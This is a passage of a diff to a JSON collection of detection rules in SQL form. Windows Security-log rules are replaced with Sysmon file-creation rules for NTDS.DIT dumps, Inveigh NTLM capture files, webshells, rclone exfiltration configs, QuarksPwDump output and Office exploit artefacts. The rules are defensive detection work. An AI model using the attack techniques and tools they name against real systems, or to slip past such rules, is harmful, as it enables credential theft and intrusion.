'\\' OR RelativeTargetName LIKE 'TermSrv\\_API\\_service' ESCAPE '\\' OR RelativeTargetName LIKE 'MsFteWds' ESCAPE '\\' OR RelativeTargetName LIKE 'sql\\\\query' ESCAPE '\\' OR RelativeTargetName LIKE 'eventlog' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\Local\\\\Microsoft\\\\Windows\\\\SchCache\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.sch' ESCAPE '\\') AND NOT (((Image LIKE 'C:\\\\windows\\\\system32\\\\svchost.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\windows\\\\system32\\\\dllhost.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\windows\\\\system32\\\\mmc.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\CCM\\\\CcmExec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Cylance\\\\Desktop\\\\CylanceSvc.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Windows\\\\ccmsetup\\\\autoupgrade\\\\ccmsetup%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\SentinelOne\\\\Sentinel Agent%' ESCAPE '\\')) OR (Image LIKE '%\\\\LANDesk\\\\LDCLient\\\\ldapwhoami.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\system32\\\\efsui.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\system32\\\\dsac.exe' ESCAPE '\\')) OR (Image LIKE '%:\\\\Program Files\\\\Citrix\\\\Receiver StoreFront\\\\Services\\\\DefaultDomainServices\\\\Citrix.DeliveryServices.DomainServices.ServiceHost.exe' ESCAPE '\\')))" ], - "filename": "win_security_lm_namedpipe.yml" + "filename": "file_event_win_susp_adsi_cache_usage.yml" }, { - "title": "Possible PetitPotam Coerce Authentication Attempt", - "id": "1ce8c8a3-2723-48ed-8246-906ac91061a6", - "status": "experimental", - "description": "Detect PetitPotam coerced authentication activity.", - "author": "Mauricio Velazco, Michael Haag", + "title": "Suspicious NTDS.DIT Creation", + "id": "4e7050dd-e548-483f-b7d6-527ab4fa784d", + "status": "test", + "description": "Detects suspicious creations of a file named \"ntds.dit\" (Active Directory Database) by suspicious parent process, directory or a suspicious one liner", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1187" + "attack.t1003.003" ], "falsepositives": [ - "Unknown. Feedback welcomed." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*' ESCAPE '\\' AND ShareName LIKE '%\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'lsarpc' AND SubjectUserName = 'ANONYMOUS LOGON')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%\\\\ntds.dit' ESCAPE '\\' AND ((ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\apache%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\' OR ParentImage LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_petitpotam_network_share.yml" + "filename": "file_event_win_ntds_dit.yml" }, { - "title": "Persistence and Execution at Scale via GPO Scheduled Task", - "id": "a8f29a7b-b137-4446-80a0-b804272f3da2", - "status": "test", - "description": "Detect lateral movement using GPO scheduled task, usually used to deploy ransomware at scale", - "author": "Samir Bousseaden", + "title": "Inveigh Execution Artefacts", + "id": "bb09dd3e-2b78-4819-8e35-a7c1b874e449", + "status": "experimental", + "description": "Detects the presence and execution of Inveigh via dropped artefacts", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.lateral_movement", - "attack.t1053.005" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "If the source IP is not localhost then it's super suspicious, better to monitor both local and remote changes to GPO scheduledtasks" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\SYSVOL' ESCAPE '\\' AND RelativeTargetName LIKE '%ScheduledTasks.xml' ESCAPE '\\' AND (Accesses LIKE '%WriteData%' ESCAPE '\\' OR Accesses LIKE '%\\%\\%4417%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\Inveigh-Log.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-Cleartext.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv1Users.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv2Users.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv1.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv2.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-FormInput.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-Relay.ps1' ESCAPE '\\'))" ], - "filename": "win_security_gpo_scheduledtasks.yml" + "filename": "file_event_win_hktl_inveigh_artefacts.yml" }, { - "title": "Hacktool Ruler", - "id": "24549159-ac1b-479c-8175-d42aea947cae", - "status": "test", - "description": "This events that are generated when using the hacktool Ruler by Sensepost", - "author": "Florian Roth (Nextron Systems)", + "title": "File Creation In Suspicious Directory By Msdt.EXE", + "id": "318557a5-150c-4c8d-b70e-a9910e199857", + "status": "experimental", + "description": "Detects msdt.exe creating files in suspicious directories which could be a sign of exploitation of either Follina or Dogwalk vulnerabilities", + "author": "Vadim Varganov, Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.execution", - "attack.t1087", - "attack.t1114", - "attack.t1059", - "attack.t1550.002" + "attack.persistence", + "attack.t1547.001", + "cve.2022.30190" ], "falsepositives": [ - "Go utilities that use staaldraad awesome NTLM library" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4776' AND Workstation = 'RULER') OR (EventID IN ('4624', '4625') AND WorkstationName = 'RULER')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msdt.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" ], - "filename": "win_security_alert_ruler.yml" + "filename": "file_event_win_msdt_susp_directories.yml" }, { - "title": "SMB Create Remote File Admin Share", - "id": "b210394c-ba12-4f89-9117-44a2464b9511", + "title": "Windows Webshell Creation", + "id": "39f1f9f2-9636-45de-98f6-a4046aa8e4b9", "status": "test", - "description": "Look for non-system accounts SMB accessing a file with write (0x2) access mask via administrative share (i.e C$).", - "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", + "description": "Possible webshell file creation on a static web site", + "author": "Beyu Denis, oscd.community, Tim Shelton", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ - "Unknown" + "Legitimate administrator or developer creating legitimate executable files in a web application folder" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '%C$' ESCAPE '\\' AND AccessMask = '0x2') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\inetpub\\\\wwwroot\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.asp%' ESCAPE '\\' OR TargetFilename LIKE '%.ashx%' ESCAPE '\\' OR TargetFilename LIKE '%.ph%' ESCAPE '\\')) OR ((TargetFilename LIKE '%\\\\www\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\htdocs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\html\\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.ph%' ESCAPE '\\')) AND NOT (((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) OR (Image = 'System') OR (TargetFilename LIKE '%\\\\xampp%' ESCAPE '\\')))" ], - "filename": "win_security_smb_file_creation_admin_shares.yml" + "filename": "file_event_win_webshell_creation_detect.yml" }, { - "title": "NetNTLM Downgrade Attack", - "id": "d3abac66-f11c-4ed0-8acb-50cc29c97eed", + "title": "Rclone Config File Creation", + "id": "34986307-b7f4-49be-92f3-e7a4d01ac5db", "status": "test", - "description": "Detects NetNTLM downgrade attack", - "author": "Florian Roth (Nextron Systems), wagga", + "description": "Detects Rclone config file being created", + "author": "Aaron Greetham (@beardofbinary) - NCC Group", "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.t1112" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unknown" + "Legitimate Rclone usage (rare)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4657' AND ObjectName LIKE '%\\\\REGISTRY\\\\MACHINE\\\\SYSTEM%' ESCAPE '\\' AND ObjectName LIKE '%ControlSet%' ESCAPE '\\' AND ObjectName LIKE '%\\\\Control\\\\Lsa%' ESCAPE '\\' AND ObjectValueName IN ('LmCompatibilityLevel', 'NtlmMinClientSec', 'RestrictSendingNTLMTraffic'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\.config\\\\rclone\\\\%' ESCAPE '\\')" ], - "filename": "win_security_net_ntlm_downgrade.yml" + "filename": "file_event_win_rclone_exec_file.yml" }, { - "title": "Active Directory Replication from Non Machine Account", - "id": "17d619c1-e020-4347-957e-1d1207455c93", + "title": "Wmiprvse Wbemcomn DLL Hijack - File", + "id": "614a7e17-5643-4d89-b6fe-f9df1a79641c", "status": "test", - "description": "Detects potential abuse of Active Directory Replication Service (ADRS) from a non machine account to request credentials.", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.credential_access", - "attack.t1003.006" + "attack.execution", + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND AccessMask = '0x100' AND (Properties LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image = 'System' AND TargetFilename LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\')" ], - "filename": "win_security_ad_replication_non_machine_account.yml" + "filename": "file_event_win_wmiprvse_wbemcomn_dll_hijack.yml" }, { - "title": "Invoke-Obfuscation Via Use Rundll32 - Security", - "id": "cd0f7229-d16f-42de-8fe3-fba365fbcb3a", + "title": "Suspicious Word Cab File Write CVE-2021-40444", + "id": "60c0a111-787a-4e8a-9262-ee485f3ef9d5", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects file creation patterns noticeable during the exploitation of CVE-2021-40444", + "author": "Florian Roth (Nextron Systems), Sittikorn S", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.resource_development", + "attack.t1587" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND ServiceFileName LIKE '%rundll32%' ESCAPE '\\' AND ServiceFileName LIKE '%shell32.dll%' ESCAPE '\\' AND ServiceFileName LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ServiceFileName LIKE '%value%' ESCAPE '\\' OR ServiceFileName LIKE '%invoke%' ESCAPE '\\' OR ServiceFileName LIKE '%comspec%' ESCAPE '\\' OR ServiceFileName LIKE '%iex%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%.cab' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Windows\\\\INetCache%' ESCAPE '\\') OR (Image LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.inf%' ESCAPE '\\')) AND NOT (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%AppData\\\\Local\\\\Temp%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Content.inf' ESCAPE '\\'))" ], - "filename": "win_security_invoke_obfuscation_via_use_rundll32_services_security.yml" + "filename": "file_event_win_winword_cve_2021_40444.yml" }, { - "title": "WCE wceaux.dll Access", - "id": "1de68c67-af5c-4097-9c85-fe5578e09e67", + "title": "Hijack Legit RDP Session to Move Laterally", + "id": "52753ea4-b3a0-4365-910d-36cff487b789", "status": "test", - "description": "Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host", - "author": "Thomas Patzke", + "description": "Detects the usage of tsclient share to place a backdoor on the RDP source machine's startup folder", + "author": "Samir Bousseaden", "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.s0005" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4658', '4660', '4663') AND ObjectName LIKE '%\\\\wceaux.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\mstsc.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\')" ], - "filename": "win_security_mal_wceaux_dll.yml" + "filename": "file_event_win_tsclient_filewrite_startup.yml" }, { - "title": "HybridConnectionManager Service Installation", - "id": "0ee4d8a5-4e67-4faf-acfa-62a78457d1f2", - "status": "test", - "description": "Rule to detect the Hybrid Connection Manager service installation.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Created Files by Office Applications", + "id": "c7a74c80-ba5a-486e-9974-ab9e682bc5e4", + "status": "experimental", + "description": "This rule will monitor executable and script file creation by office applications. Please add more file extensions or magic bytes to the logic of your choice.", + "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", "tags": [ - "attack.persistence", - "attack.t1554" + "attack.t1204.002", + "attack.execution" ], "falsepositives": [ - "Legitimate use of Hybrid Connection Manager via Azure function apps." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceName = 'HybridConnectionManager' AND ServiceFileName LIKE '%HybridConnectionManager%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\' OR TargetFilename LIKE '%.com' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.proj' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\WebServiceCache\\\\AllUsers%' ESCAPE '\\' AND TargetFilename LIKE '%.com' ESCAPE '\\') OR (Image LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\webexdelta\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\')) OR (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\assembly\\\\tmp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\')))" ], - "filename": "win_security_hybridconnectionmgr_svc_installation.yml" + "filename": "file_event_win_script_creation_by_office_using_file_ext.yml" }, { - "title": "Possible Shadow Credentials Added", - "id": "f598ea0c-c25a-4f72-a219-50c44411c791", + "title": "Office Macro File Creation From Suspicious Process", + "id": "b1c50487-1967-4315-a026-6491686d860e", "status": "experimental", - "description": "Detects possible addition of shadow credentials to an active directory object.", - "author": "Nasreddine Bencherchali (Nextron Systems), Elastic (idea)", + "description": "Detects the creation of a office macro file from a a suspicious process", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1556" + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "Modifications in the msDS-KeyCredentialLink attribute can be done legitimately by the Azure AD Connect synchronization account or the ADFS service account. These accounts can be added as Exceptions. (From elastic FP section)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-KeyCredentialLink')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\')) AND (TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.potm' ESCAPE '\\' OR TargetFilename LIKE '%.pptm' ESCAPE '\\'))" ], - "filename": "win_security_susp_possible_shadow_credentials_added.yml" + "filename": "file_event_win_office_macro_files_from_susp_process.yml" }, { - "title": "Password Change on Directory Service Restore Mode (DSRM) Account", - "id": "53ad8e36-f573-46bf-97e4-15ba5bf4bb51", - "status": "stable", - "description": "The Directory Service Restore Mode (DSRM) account is a local administrator account on Domain Controllers. Attackers may change the password to gain persistence.", - "author": "Thomas Patzke", + "title": "Suspicious DotNET CLR Usage Log Artifact", + "id": "e0b06658-7d1d-4cd3-bf15-03467507ff7c", + "status": "experimental", + "description": "Detects the creation of Usage Log files by the CLR (clr.dll). These files are named after the executing process once the assembly is finished executing for the first time in the (user) session context.", + "author": "frack113, omkar72, oscd.community, Wojciech Lesicki", "tags": [ - "attack.persistence", - "attack.t1098" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Initial installation of a domain controller" + "Rundll32.exe with zzzzInvokeManagedCustomActionOutOfProc in command line and msiexec.exe as parent process - https://twitter.com/SBousseaden/status/1388064061087260675" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4794')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\UsageLogs\\\\cmstp.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\cscript.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\mshta.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\msxsl.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\regsvr32.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\rundll32.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\svchost.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\wscript.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\wmic.exe.log' ESCAPE '\\') AND NOT ((ParentImage LIKE '%\\\\MsiExec.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% -Embedding%' ESCAPE '\\' AND Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%Temp%' ESCAPE '\\' AND CommandLine LIKE '%zzzzInvokeManagedCustomActionOutOfProc%' ESCAPE '\\')))" ], - "filename": "win_security_susp_dsrm_password_change.yml" + "filename": "file_event_win_net_cli_artefact.yml" }, { - "title": "Sysmon Channel Reference Deletion", - "id": "18beca67-ab3e-4ee3-ba7a-a46ca8d7d0cc", + "title": "QuarksPwDump Dump File", + "id": "847def9e-924d-4e90-b7c4-5f581395a2b4", "status": "test", - "description": "Potential threat actor tampering with Sysmon manifest and eventually disabling it", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects a dump file written by QuarksPwDump password dumper", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4657' AND (ObjectName LIKE '%WINEVT\\\\Publishers\\\\{5770385f-c22a-43e0-bf4c-06f5698ffbd9}%' ESCAPE '\\' OR ObjectName LIKE '%WINEVT\\\\Channels\\\\Microsoft-Windows-Sysmon/Operational%' ESCAPE '\\') AND ObjectValueName = 'Enabled' AND NewValue = '0') OR (EventID = '4663' AND (ObjectName LIKE '%WINEVT\\\\Publishers\\\\{5770385f-c22a-43e0-bf4c-06f5698ffbd9}%' ESCAPE '\\' OR ObjectName LIKE '%WINEVT\\\\Channels\\\\Microsoft-Windows-Sysmon/Operational%' ESCAPE '\\') AND AccessMask = '65536')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\SAM-%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp%' ESCAPE '\\')" ], - "filename": "win_security_sysmon_channel_reference_deletion.yml" + "filename": "file_event_win_hktl_quarkspw_filedump.yml" }, { - "title": "Operation Wocao Activity - Security", - "id": "74ad4314-482e-4c3e-b237-3f7ed3b9ca8d", + "title": "CVE-2021-26858 Exchange Exploitation", + "id": "b06335b3-55ac-4b41-937e-16b7f5d57dfd", "status": "test", - "description": "Detects activity mentioned in Operation Wocao report", - "author": "Florian Roth (Nextron Systems), frack113", + "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26858 by looking for \ncreation of non-standard files on disk by Exchange Server’s Unified Messaging service\nwhich could indicate dropping web shells or other malicious content\n", + "author": "Bhabesh Raj", "tags": [ - "attack.discovery", - "attack.t1012", - "attack.defense_evasion", - "attack.t1036.004", - "attack.t1027", + "attack.t1203", "attack.execution", - "attack.t1053.005", - "attack.t1059.001" + "cve.2021.26858" ], "falsepositives": [ - "Administrators that use checkadmin.exe tool to enumerate local administrators" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4799' AND TargetUserName LIKE 'Administr%' ESCAPE '\\' AND CallerProcessName LIKE '%\\\\checkadmin.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%UMWorkerProcess.exe' ESCAPE '\\' AND NOT ((TargetFilename LIKE '%CacheCleanup.bin' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.LOG' ESCAPE '\\' OR TargetFilename LIKE '%.cfg' ESCAPE '\\' OR TargetFilename LIKE '%cleanup.bin' ESCAPE '\\')))" ], - "filename": "win_security_apt_wocao.yml" + "filename": "file_event_win_cve_2021_26858_msexchange.yml" }, { - "title": "Suspicious Scheduled Task Update", - "id": "614cf376-6651-47c4-9dcc-6b9527f749f4", + "title": "PSEXEC Remote Execution File Artefact", + "id": "304afd73-55a5-4bb9-8c21-0b1fc84ea9e4", "status": "experimental", - "description": "Detects update to a scheduled task event that contain suspicious keywords.", + "description": "Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", + "attack.lateral_movement", "attack.privilege_escalation", + "attack.execution", "attack.persistence", - "attack.t1053.005" + "attack.t1136.002", + "attack.t1543.003", + "attack.t1570", + "attack.s0029" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4702' AND (TaskContentNew LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\') AND (TaskContentNew LIKE '%regsvr32%' ESCAPE '\\' OR TaskContentNew LIKE '%rundll32%' ESCAPE '\\' OR TaskContentNew LIKE '%cmd.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%cmd%' ESCAPE '\\' OR TaskContentNew LIKE '%/c %' ESCAPE '\\' OR TaskContentNew LIKE '%/k %' ESCAPE '\\' OR TaskContentNew LIKE '%/r %' 